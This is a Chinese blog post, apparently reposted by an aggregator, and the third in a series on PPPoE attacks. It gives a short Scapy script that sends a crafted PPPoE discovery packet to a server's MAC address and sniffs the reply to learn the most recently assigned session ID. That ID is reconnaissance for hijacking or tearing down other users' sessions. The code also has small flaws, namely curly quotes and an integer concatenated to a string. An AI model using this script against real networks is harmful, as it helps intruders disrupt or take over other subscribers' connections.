首页 > 其他 > 详细

PPPoE攻击3:获取最新的sessionid

时间:2014-10-31 06:33:54      阅读:300      评论:0      收藏:0      [点我收藏+]

    在PPPoE会话的发现阶段,服务器会向客户端分配sessionid,而经过本人测试,这个sessionid的值是依次增大的;即:进行一次会话,得到sessionid为1,这时其他客户端进行拨号时,分配的sessionid为2,依次类推......

    

    那么,如何得到当前已经分配的sessionid范围呢?我们可以模拟一下PPPoE会话,得到新的sessionid。


    实现本功能的代码如下:

from scapy.all  import *

#你的PPPoE服务器的mac地址,请酌情修改
servermac="00:0c:29:c6:ab:bc"

#定义PPPoE数据包的格式
def packet(code=0x09,len=0,macadd=‘ff:ff:ff:ff:ff:ff‘):
        a=Ether()/PPPoE()
        a.dst=macadd
        a.type=0x8863
        a.payload.version=1
        a.payload.type=1
        a.payload.code=code
        a.payload.len=len
        return a

        #发送PADR数据包
sendp(packet(macadd=servermac,code=0x19))

#嗅探网卡得到的数据
c=sniff(filter=‘pppoed‘,count=1)

#PPPoE服务器返回的数据包(报文包含sessionid)
print ‘PPPoE服务器的最新sessionid是 ‘+c[0].payload.sessionid


本文出自 “python小程序” 博客,请务必保留此出处http://mdh6789.blog.51cto.com/7270513/1569859

PPPoE攻击3:获取最新的sessionid

原文:http://mdh6789.blog.51cto.com/7270513/1569859

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!